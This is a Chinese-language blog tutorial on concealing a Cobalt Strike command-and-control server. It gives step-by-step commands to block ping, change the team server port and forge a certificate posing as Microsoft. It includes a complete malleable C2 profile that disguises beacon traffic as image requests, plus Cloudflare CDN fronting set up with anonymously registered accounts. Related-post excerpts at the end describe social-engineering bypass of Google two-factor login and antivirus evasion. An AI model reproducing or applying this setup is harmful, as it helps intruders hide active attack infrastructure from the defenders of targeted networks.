内网神器Cobalt Strike隐藏特征与流量混淆

VSole2023-06-01 09:23:49

CS服务端配置

 0x01. 需求配置

  • vps一台
  • 域名
  • CDN
  • Cobalt Strike4.0

 0x02. 服务器设置禁ping

服务器禁ping从某种意义上来说,算是不存活的主机,但nmap是依然能够扫描出来的。设置禁ping命令:

vim /etc/sysctl.conf 打开后按i进入编辑模式,在任意位置新增以下内容
net.ipv4.icmp_echo_ignore_all=1

新增之后 ESC -> 冒号 -> wq[退出并保存]再使用命令 sysctl -p 即可生效,这时候再ping主机就会ping不通了。

0x03. 修改Cobalt Strike默认端口号

在服务端的teamserver文件末尾处修改

修改之后再次启动teamserver的时候即可看到端口已经更改。

0x04. 修改默认证书

Cobalt Strike默认证书中含有与cs相关的特征,所以需要替换掉cs原有的证书,重新生成一个无特征的证书文件。前提条件:服务器上已安装java使用jdk自带的keytools这个java证书管理工具来生成新的无特征证书。

  • 首先删除cobalt strike原有的证书
  • 新建一个其他名字,只需要在teamserver最后一行修改 -Djavax.net.ssl.keyStore=./new.store 即可
  • 在Cobalt Strike当前目录生成一个无特征的证书
keytool -keystore 生成的store名 -storepass 密码 -keypass 密码 -genkey -keyalg RSA -alias 自定义别名 -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"
keytool -keystore new.store -storepass bypass -keypass bypass -genkey -keyalg RSA -alias apex.tk -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"

  • 修改证书标准并应用
> keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

至此证书修改完成,使用命令:keytool -list -v -keystore cobaltstrike.store 可查看证书内容

可以看到签名是92EE36结尾,启动teamserver看看证书签名是否一致:

签名一致,确认证书修改成功.

0x05.混淆流量

接下来修改Beacon与cobalt strike通信时候的流量特征,创建一个.profile文件(名字任意),贴入以下从大佬那里偷过来的代码。

https-certificate {
    set keystore "new.store";    #证书名字
    set password "bypass";        #证书密码
}
#以上没有配置cloudflare的时候可以先不写
http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Host" "apex1.tk";  #域名,还没有配置cloudflare的时候这一行注释掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append ".jpg";  # 传输内容自动追加的后缀
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;  # 加密方式(base64、base64url、netbios、netbiosu)
            print;
        }
    }
}
http-post {
    set uri "/email/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com"; 
        header "Host" "apex1.tk";  #域名,还没有配置cloudflare的时候这一行注释掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".png";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}

保存之后赋予服务端的c2lint执行权限:chmod 777 c2lint

然后输入:./c2lint img.profile

输出如下图所示即为配置成功

使用CDN隐藏

0x01. 申请免费域名(白嫖是真香啊.)

白嫖域名连接:www.freenom.com 可以用来做博客域名、也可用来做其他用处白嫖的可以不留过多信息,使用谷歌账号登录即可.记得科学上网挂着,不然有可能申请不通过。

域名自己随便写一个喜欢的即可,检查可用性,然后点击selected,Checkout即可,1-12个月都是免费的

0x02. CDN配置(白嫖系列)

一时白嫖一时爽,一直白嫖一直爽,使用Cloudflare白嫖cdn.有账号可以继续使用该账号进行添加站点,没有账号使用匿名邮箱注册一个即可.(推荐outlook、protonmail都可匿名)

1. 添加站点记录

这里添加站点,有时候会报错,google、baidu了很多方法都不管用,于是乎第二天就可以添加到了。

2. 添加DNS记录

根据自己喜欢随便整就行,解析记得写vps的地址,代理状态是默认开启,没有的话手动开启一下即可.

3. 修改DNS服务器

去freenom中删除dns名称服务器,添加为cloudflare的名称服务器

到freenom中修改dns服务器

4. 配置完成

以上操作完成之后回到cloudflare进行下一步将https重写、始终使用https、Brotli都关闭并保存,之后点击检查名称服务器点击检查之后过一会儿刷新一下页面,出现以下就代表成功了

一定要开启开发者模式!!!缓存 -> 开发模式 开启

Cloudflare CDN支持的http端口:80,8080,8880,2052,2082,2086,2098Cloudflare CDN支持的https端口:443,2053,2083,2087,2096,8443

5.HTTPS证书配置

首先配置配置SSL/TLS加密模式为完全,点击 源服务器 -> 创建证书,把密钥和证书复制保存下来,分别保存为pem.pem和key.key,然后上传到cobalt strike服务端

上传到服务端之后,使用keytool重新创建store证书:

首先执行openssl pkcs12 -export -in 证书名 -inkey 私钥名 -out p12名,如abc.p12 -name 域名 -passout pass:bypass

openssl pkcs12 -export -in pem.pem -inkey key.key -out apex.tk.p12 -name apex.tk -passout pass:bypass

其次执行keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore store名 -srckeystore p12名,如abc.p12 -srcstoretype PKCS12 -srcstor epass 密码 -alias 别名

keytool -importkeystore -deststorepass bypass -destkeypass bypass -destkeystore new.store -srckeystore apex.tk.p12 -srcstoretype PKCS12 -srcstor epass bypass -alias apex.tk

最后在profile配置文件中,取消注释头部的代码即可。

启动服务端的时候命令:./teamserver xx.xx.xx.xx password img.profile

6.测试上线

Listener按照下图配置,HTTPS同理

参考文档:https://www.jianshu.com/p/e7701efef047https://www.cnblogs.com/Xy--1/p/14396744.htmlhttps://lengjibo.github.io/malleable/

bypasskeytool
本作品采用《CC 协议》,转载必须注明作者和本文链接
需求配置vps一台域名CDNCobalt Strike4.0?0x02. 服务器设置禁ping服务器禁ping从某种意义上来说,算是不存活的主机,但nmap是依然能够扫描出来的。设置禁ping命令:vim /etc/sysctl.conf 打开后按i进入编辑模式,在任意位置新增以下内容。0x03. 修改Cobalt Strike默认端口号在服务端的teamserver文件末尾处修改修改之后再次启动teamserver的时候即可看到端口已经更改。修改证书标准并应用> keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
前言 今天本来想做个PS1的免杀,但做的时候要用到cobaltstrike来生成ps1后门 刚开始的时候并不知道cobaltstrike是一个用于团队项目的工具,所以过程中出现了很多问题。为了让大家熟悉cobaltstrike的运行流程 感觉还是很有必要写一篇有关cobaltstrike公网配置的文章。顺便讲一下一个很不错的免杀脚本 新版本的CS要配合linux服务端才能运行起来。更多操作等你们发现~ 原创:...
一款bypass cdn工具
2023-06-12 09:53:18
Bypass_cdn 基于python3开发的信息收集工具,绕过CDN查找目标的真实IP地址。
前言某次小型红蓝,直接丢过来几个登陆框,定点打。环境介绍全部都是shiro框架。过程爆破用户名密码,都是加密的。查看网页源代码的时候,发现其中一个利用的DES-ECB的单层加密。果断生成大量的字段。我的超大字典,都没有爆破出一个有效的账号。一上午毫无收获,陷入沉思。用上午在A系统登陆显示没有应用权限的账号,但是不会自动解压,没有找到可以利用的点。在目标机器部署了cs。
Bypass 谷歌登录的二次验证大家好, 今天的文章将非常有趣,因为我们将讨论一种方法,我们可以使用这种方法通过欺骗受害者来轻松绕过“ Google 双因素身份验证”。社会工程学真正的步骤从这里开始,我们现在将使用社会工程技术来捕获受害者的设备信息。
Bypass 谷歌登录的二次验证大家好, 今天的文章将非常有趣,因为我们将讨论一种方法,我们可以使用这种方法通过欺骗受害者来轻松绕过“ Google 双因素身份验证”。社会工程学真正的步骤从这里开始,我们现在将使用社会工程技术来捕获受害者的设备信息。一切都完成后, “打开”拦截模式,然后转到谷歌帐户并单击 “下一步”。一旦您转发请求,就会向受害者手机发送一条通知警报,并要求允许该帐户登录受害者正在使用的设备。
bypass 杀软笔记
2022-08-10 22:40:44
卡巴斯基的相关研究本次就是对高级版的卡巴斯基的程序进行测试,测试了各种方式,一度让我陷入了自闭,真的bypass不了了吗?几个月之前我曾使用syscall成功绕过卡巴斯基的动态检测,也使用其他的方式同样绕过,几个月之后,发现卡巴斯基的学习能力是真的快,我不敢保证程序没有被泄露。这样就需要去修改C2的源码,修改为全新的特征,基于目前来说,我暂时没有这样做。
bypass 小技巧
2022-03-20 07:02:38
1、bypass 403、4012、如果 Web 应用程序允许上传 .zip 文件,则 可通过zip://将 LFI 转换为 RCE。3、使用通配符bypass waf
Bypass Shellcode - Encryptor
2022-01-03 08:55:10
Bypass Shellcode - Encryptor
VSole
网络安全专家